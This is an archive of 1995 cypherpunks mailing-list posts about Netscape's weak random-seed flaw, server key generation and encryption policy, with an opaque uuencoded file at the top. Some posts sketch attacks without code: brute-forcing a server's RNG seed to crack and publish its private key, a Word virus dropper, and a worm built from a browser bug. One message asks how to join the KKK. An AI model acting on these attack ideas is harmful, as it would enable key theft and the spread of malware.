M8)PBC%,\N\V-VS0$AEUS$[B^IG72CZAGV14]1[H3K-H`$,CFPK8<DRP+*MV,
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
M4$L!`A0`%``"``@```@T&_B:9'=O`@``700```8``````````0`@````O1\`
=`%)%041-15!+!08`````!``$`-\```!0(@``````
`
end
sum -r/size 45061/12471 section (from "begin" to "end")
sum -r/size 19623/9029 entire input file

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGKA894nNf3ah8DHAQHqfwP/ao6/+WwjDqv/DVfFHSupinSVq13tJurf
GwTGRHuztQQcqGsCmEJyd7VDJG5L/Hdcqqwq2VL0KYbkSEo4HhNuRuZlQfVbTCQ9
0U3ShLUf3HaFf3n+ZoyU+QRt/GMuF4DTCnUwPW/FNSvwI2JdjoRDliCG4HuRLr/X
ANKfSG9XxIc=
=U7/K
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 22 Sep 95 21:42:57 PDT
To: Stephan Somogyi <cypherpunks@toad.com
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <v03003400ac88a55e4e4b@[198.93.25.99]>
Message-ID: <9509230442.AA07912@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Has anyone already created the necessary patches for Apache
><http://www.apache.org/>, or does anyone know whether the Apache dev
>team would be amenable to including conditional directives to allow the
>build of a secure version? If anyone is thinking of making the effort
>to create a publicly available secure server, Apache's probably the
>best source base to work with.

I can't speak for Apatche but we have two of the developers in the building 
here.  From what they have said security patches would be wellcomed with open 
arms. If anyone wants to do the same for the CERN server, we can roll it out 
through W3C likewise.

The real issue though would be whetehr there was confidence in the security of 
the system. Simply bolting SSL in in a cack handed manner would not cut it IMHO. 
Basically I would not recommend a release of such a system to the Apatche group 
unless a I was happy with the security of the whole system. This may well 
involve a number of fixes in the rest of the code.

I'm also very interested if anyone wants to brave S-HTTP, there is a public 
domain version in production. Basically the more people want to work on this 
type of stuff the better.

The main hassle is in programming the authorization stuff however... don't 
underestimate the amount of work involved in doing a good job there.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 22:16:31 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.90.950922194817.11370A-100000@dfw.net>
Message-ID: <199509230513.BAA23938@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Actually it allows you to imbed data and commands to run. What the latest
> MSWord virus did is imbed a virus dropper encoded in the word document
> and then run it trough the dos debug command to make it a binary file
> (if you ever read the 40HEX virus magazine you should know how this works).
> From there it just run the dropper.

  You could make a worm out of this Netscape bug by having it look
for a user's homepage when it infects, and then inserting the
URL into that page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rooster@ix.netcom.com (BRIAN PROBST )
Date: Sat, 23 Sep 95 01:48:01 PDT
To: GET@ix.netcom.com
Subject: No Subject
Message-ID: <199509230847.BAA22935@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


IN TOUCH TO THE LOCAL KLAVERN IN THE DALLAS AREA?IF SO THEN SEND ME 
E-MAIL AT:

                        ROOSTER@IX.NETCOM.COM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 22 Sep 95 17:32:50 PDT
To: cypherpunks@toad.com
Subject: test
Message-ID: <199509230032.CAA28999@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rooster@ix.netcom.com (BRIAN PROBST )
Date: Sat, 23 Sep 95 02:53:19 PDT
To: cypherpunks@toad.com I WAS WONDERING HOW TO GET IN THE KKK.I LIVE IN DALLAS,       TEXAS.CAN YOU HELP ME? IF SO THEN YOU CAN E-MAIL ME AT:@ix.netcom.com
Subject: No Subject
Message-ID: <199509230953.CAA21280@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




                                            ROSTER@IX.NETCOM.COM 


                                                     THANK YOU!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 23 Sep 95 03:00:16 PDT
To: Dave_Neuenschwander@va.arca.com
Subject: Re: Fwd: Re: Project: a standard cell random number generator
Message-ID: <9509230959.AA23786@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Yes Fortezza cards can be instructed to produce a random number through one
>of its library calls (someday they'll have a real API).  One of the

I don't understand the parenthetical comment.  Are you saying the
API that the NSA defined isn't supported by everyone, isn't complete,
or is "bad"?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 23:01:03 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
In-Reply-To: <199509211832.LAA24086@infinity.c2.org>
Message-ID: <4407p5$on4@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509211832.LAA24086@infinity.c2.org>, sameer@c2.org (sameer) writes:
> 	Now that we've seen that Netscape is doing a good job towards
> trying to fix the hole that Ian and David have uncovered, it's time to
> start looking at new things.
> 
> 	Given the recent post to the www-security list that was
> forwarded here, it seems like just replacing the server may not work
> for all the secure servers out there-- keys may have to be replaced as
> well. Let's find out.
> 
> Proposal for action:
> 
> 1) Reverse-engineer a server to see if the keygen phase uses
> a weak RNG seed. -- if so, determine the exact algorithim.
> 
> 2) Organize a net-wide search over the space of the RNG seed to 
> crack the private key of some well known secure server.
> 
> 3) Release the private key to the net.

  What exactly is the point of this?  We have:

	1) acknowledged that the RNG used in the server private-key
		generation has the same problem

	2) said that we will provide a patch early next week

	3) said that we will provide new certificates for all customers

	4) promised to make source code for our new seed generation code
		publicly available

  What else do you hope to gain by breaking a server key?  I think
the point has been made.  Is there anything else that you would
reasonably expect that we would do in response to a server key
being broken that we have not already done?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 23 Sep 95 07:30:22 PDT
To: perry@piermont.com
Subject: Re: Seeds which depend on machine states
Message-ID: <199509231430.HAA23116@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:19 AM 9/22/95 -0700, Patrick Horgan wrote:
> That assumes that you have someway of measuring the timing to microsecond
> precision.  On most machines I've been on, if you get something time-
> stamped, even if there is a microsecond portion of the timestamp it's
> meaningless because it wasn't based on a timer with the required precision.

On Windows there is a timer with the required precision -- not microsecond
accuracy of course -- microsecond precision.  For our purposes the less
accuracy the better.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 23 Sep 95 05:17:20 PDT
To: cypherpunks@toad.com
Subject: HEY!!! WAS: The Next Hack
Message-ID: <199509231217.FAA27504@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hey wait a minute!!!

You HAD stated a patch would be available by Friday.
Now we are at early next week.

I watched the stock rise in the face of bad facts.
Almost 25% of your stock changed hands yesterday.

For the moment, it seems to me, anyway, you're getting
a lot of work done here for dirt cheap. I don't know
cypher codes very well, but I know Wall St. codes really
well. And THEY ARE BEING VIOLATED! I am glad there is no
anonymity on Wall St. We are starting to get into the
realm of SEC action. And I could really care much about
what happens out on the list.

This is not a problem that lends itself to 'quick fixes'.
For the only "quick fix you can give is still insecure crypto".

That is the point of this.
You can't really fix it.
Most of us know it.
The lies mount up
on the stock price.

I normally couldn't care less, I'm a Coca-Cola trader.
My stock is at an all time high as I write this.
It's up over 1200% in 10 years. No one can match it. (even MSFT)

This is much worse than NEW COKE!

For you are now better off letting them break key after key,
server after server, until the laws change. 

I'd go back and talk to your management fast.
For now you've become a pawn in a political game.
And millions of dollars change hands daily as a result.

Soon they will halt your stock trading if this keeps up.

Something, in a way far worse than ever having Netscape cracked!

Think about it.

Love Always,

Carol Anne
ps I shipped all the postings to Washington already.

>  What exactly is the point of this?  We have:
>
>	1) acknowledged that the RNG used in the server private-key
>		generation has the same problem
>
>	2) said that we will provide a patch early next week
>
>	3) said that we will provide new certificates for all customers
>
>	4) promised to make source code for our new seed generation code
>		publicly available

>  What else do you hope to gain by breaking a server key?  I think
>Jeff Weinstein - Electronic Munitions Specialist
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s
0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG
T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo
JpbxSBXgCX4=
=C7J9
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sat, 23 Sep 95 04:47:45 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: The Next Hack
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <199509231147.HAA21618@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> In article <199509211832.LAA24086@infinity.c2.org>, sameer@c2.org
> (sameer) writes:

> > 	Now that we've seen that Netscape is doing a good job towards
> > trying to fix the hole that Ian and David have uncovered, it's time to
> > start looking at new things.

> > Proposal for action:


Jeff writes:
>   What else do you hope to gain by breaking a server key?  I think
> the point has been made.  Is there anything else that you would
> reasonably expect that we would do in response to a server key
> being broken that we have not already done?
> 
> 	--Jeff

Clearly the point that Sameer is making includes the Meta crypto creed,
which is a that all security systems and they components should be
discussed and tested in public. That it is not enough to test
the client and that encryption contained in server products must
also be dragged into the day light.

Harry Hawk			habs@panix.com
Freelancer for NetGuide Mag.
All comments are my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 23 Sep 95 09:31:19 PDT
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199509231631.JAA17499@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:15 PM 9/23/95 DST, you wrote:
>Again, we're Spammed by a moron.
>Time to fire up the old remailers!
>[At least they do this on weekends, when we have
>time for creative revenge!] Hehehehehe...

Either that or someone left their terminal logged in.  The only better way
to assure a quick and painful death would have been to post them to a Black
Panther's mailing list.  Oh well...  Evolution in action!

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 23 Sep 95 06:42:24 PDT
To: cypherpunks@toad.com
Subject: (Fwd) Netscape Commerce Server and Certificates
Message-ID: <9509231342.AA03015@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From www-security...

------- Forwarded Message Follows -------
Date:          Sat, 23 Sep 95 01:07:38
From:          <atri@netscape.com>
Subject:       Netscape Commerce Server and Certificates
To:            "john hemming ceo marketnet"  <johnhemming@mkn.co.uk>, www-security@ns2.rutgers.edu
Cc:            

The Commerce server is significantly less vulnerable because:

1. Key pairs are generated only once
2. Access to the actual server is limited for hackers to try to guess with
some accurace when the key pair was generated.
3. The time it takes to generate key pairs is about 5 seconds on a
reasonably powerful UNIX machine.  

4. Since the random number seed address space is 30 bits, even if one knew
approximately when the server key-pair was generated it only reduces this
dows to say 20 bits.  Therefore the operation can take anywhere from (2**20
to 2**30) * 5 seconds = 5 million to 5 billion seconds.

5 million seconds = 57.8 days
5 billion seconds = 158 years

5.  We plan to have the patch available by next week

6.  You are right about server owners having to get new certificates.
Netscape and VeriSign will offer new six month certificates to all current
certificate owners at no charge.

--Atri

At 09:58 PM 9/22/95 PDT, John Hemming CEO MarketNet wrote:
>>Netscape Commerce server certificates use RSA key pairs generated by the<BR>
>>user, i.e. with "Netscape's shoddy random number genrator" (sic). All the<BR>
>>server running in "secure" mode need new RSA keys and certificates as
noted<BR>
>>in the following excerpt from the official Netscape response. <BR>
><BR>
>>"In addition, the current version of the Netscape Commerce Server has a<BR>
>>similar vulnerability during it's initial key-pair generation. Therefore,
a<BR>
>>patch will be made available from Netscape and should be applied by
Commerce<BR>
>>Server customers to generate a new key pair and server certificate." <BR>
>If that is really what Netscape have issued then it needs correcting unless
>for some reason RSA's private key is stored in the Commerce Server.  I would
>presume that a certificate request would be needed instead.
>
>There is really quite a high noise to signal ratio in dealing with the
>non randomness of the unix Navigator (which is what I understand 
>the problem to be).
>
>
>
>
____________________________________
Atri Chatterjee
Server Marketing
Netscape Communications Corporation
(415) 528-2834 (ph)
(415) 528-4120 (fax)



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sat, 23 Sep 95 08:54:43 PDT
To: cypherpunks@toad.com
Subject: MacRandoms
Message-ID: <199509231554.JAA16098@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




I tried posting this a few days ago, but it evidently got lost because of
the problems with the list. Anyway, I've uploaded my random number generator
number generation code for the Mac to:

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

This file contains Colin Plumb's randpool code, my Macintosh wrapper for
it, and a nice 68K assembler implementation of MD5 as a bonus. Enjoy.

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 23 Sep 95 08:32:13 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <v01530509ac89d419964f@[166.84.250.21]>
Message-ID: <9509231531.AA20035@alpha>
MIME-Version: 1.0
Content-Type: text/plain



David Mandl writes:
 > Looks like we've got a perfect candidate for the first Official
 > Cypherpunks Press Release, folks.

Then sign me off.  If something that inane were to go out with the
word "cypherpunk" affixed to it, I'd cringe.  It could only be worse
if it ended with the catchphrase "hack the planet".  

[ David quoted the "Censored Girl": ]
 > >Hey wait a minute!!!
 > >
 > >You HAD stated a patch would be available by Friday.
 > >Now we are at early next week.
 > >
 > >I watched the stock rise in the face of bad facts.
 > >Almost 25% of your stock changed hands yesterday.

So?

 > >For the moment, it seems to me, anyway, you're getting
 > >a lot of work done here for dirt cheap. I don't know
 > >cypher codes very well, but I know Wall St. codes really
 > >well. And THEY ARE BEING VIOLATED! I am glad there is no
 > >anonymity on Wall St. We are starting to get into the
 > >realm of SEC action. And I could really care much about
 > >what happens out on the list.

I won't even dignify this by calling it speculation; it's simply and
absolutely wrong.  Any "Netscape insiders" are locked out; they
couldn't manipulate the stock price if they wanted to, and if they
have any brains in their heads at all they're absolutely the last
people on earth who'd make a move that stupid.  It won't be until
January at the very earliest that anyone who holds restricted shares
will be allowed to trade.  The stock's in all likelihood being bounced
back and forth between big technology funds, who don't give a rat's
ass about some security bug in the product.

 > >That is the point of this.
 > >You can't really fix it.
 > >Most of us know it.

Gee, I don't know that.

 > >The lies mount up
 > >on the stock price.

Huh?  Do you actually have any earthly idea how the market works?

 > >I normally couldn't care less, I'm a Coca-Cola trader.
 > >My stock is at an all time high as I write this.
 > >It's up over 1200% in 10 years. No one can match it. (even MSFT)
 > >
 > >This is much worse than NEW COKE!

Ridiculous.

 > >Soon they will halt your stock trading if this keeps up.

I'll eat my shoe if that happens.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 07:53:30 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Council of Europe proposes to outlaw strong encryption (fwd)
In-Reply-To: <199509221509.LAA09991@panix.com>
Message-ID: <199509231453.KAA05871@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell writes:
> Question for Perry -- I'm assuming that it will soon be possible to
> originate encrypted TCP/IP sessions with a distant "process" somewhere.  Do
> you see technical problems with a TCP/IP laundry being established
> "somewhere" that strips trace info from one of my processes and prevents
> back tracing beyond the mouth of this encrypted pipe?

It can be done (in some sense its just an extension of the Socks
protocol), but I'm not sure how easy it will be to prevent all traffic
analysis on the thing. Also, if this gets done frequently, it sort of
screws up our attempts to keep up the efficiency of traffic in the network.

> Also Perry, what did you think of the article "How Anarchy Works" in the
> latest Wired on the IETF?

I haven't read it, although the IETF is certainly (whether it knows it
or not) an organization run on anarchist lines.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 23 Sep 95 09:01:16 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <v0153050aac89da46099c@[166.84.250.21]>
Message-ID: <9509231600.AA20401@alpha>
MIME-Version: 1.0
Content-Type: text/plain



David Mandl writes:
 > Sigh.  In case there was any misunderstanding, it was a JOKE.  I was making
 > a comment about "Censored Girl's" loony-bin post as well as recent
 > proposals that we should be issuing official press releases.  Surely my
 > subtle sense of humor isn't THAT subtle.  Here:

Sorry.  Caffeine deficit.  (Plus the added sensitivity of living in
the bizarre atmosphere of a recently-gone-public company.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 23 Sep 95 08:13:31 PDT
To: cypherpunks@toad.com
Subject: Re: HEY!!! WAS: The Next Hack
Message-ID: <v01530509ac89d419964f@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


Looks like we've got a perfect candidate for the first Official Cypherpunks
Press Release, folks.

   --D.

At 7:16 AM 9/23/95, Censored Girls Anonymous wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hey wait a minute!!!
>
>You HAD stated a patch would be available by Friday.
>Now we are at early next week.
>
>I watched the stock rise in the face of bad facts.
>Almost 25% of your stock changed hands yesterday.
>
>For the moment, it seems to me, anyway, you're getting
>a lot of work done here for dirt cheap. I don't know
>cypher codes very well, but I know Wall St. codes really
>well. And THEY ARE BEING VIOLATED! I am glad there is no
>anonymity on Wall St. We are starting to get into the
>realm of SEC action. And I could really care much about
>what happens out on the list.
>
>This is not a problem that lends itself to 'quick fixes'.
>For the only "quick fix you can give is still insecure crypto".
>
>That is the point of this.
>You can't really fix it.
>Most of us know it.
>The lies mount up
>on the stock price.
>
>I normally couldn't care less, I'm a Coca-Cola trader.
>My stock is at an all time high as I write this.
>It's up over 1200% in 10 years. No one can match it. (even MSFT)
>
>This is much worse than NEW COKE!
>
>For you are now better off letting them break key after key,
>server after server, until the laws change.
>
>I'd go back and talk to your management fast.
>For now you've become a pawn in a political game.
>And millions of dollars change hands daily as a result.
>
>Soon they will halt your stock trading if this keeps up.
>
>Something, in a way far worse than ever having Netscape cracked!
>
>Think about it.
>
>Love Always,
>
>Carol Anne
>ps I shipped all the postings to Washington already.
>
>>  What exactly is the point of this?  We have:
>>
>>       1) acknowledged that the RNG used in the server private-key
>>               generation has the same problem
>>
>>       2) said that we will provide a patch early next week
>>
>>       3) said that we will provide new certificates for all customers
>>
>>       4) promised to make source code for our new seed generation code
>>               publicly available
>
>>  What else do you hope to gain by breaking a server key?  I think
>>Jeff Weinstein - Electronic Munitions Specialist
>>Netscape Communication Corporation
>>jsw@netscape.com - http://home.netscape.com/people/jsw
>>Any opinions expressed above are mine.
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s
>0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG
>T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo
>JpbxSBXgCX4=
>=C7J9
>-----END PGP SIGNATURE-----
>--
>
>Member Internet Society  - Certified BETSI Programmer  -  Webmistress
>***********************************************************************
>Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
>My Homepage
>The Cyberdoc
>***********************************************************************
>------------------ PGP.ZIP Part [017/713] -------------------
>M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
>MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
>MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
>-------------------------------------------------------------
>for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 23 Sep 95 09:16:03 PDT
To: cypherpunks@toad.com
Subject: ? Me?
Message-ID: <199509231615.JAA02784@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


What? Me? Write a Cypherpunks Press Release?

Love Always,

Alfreda E. Newman
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
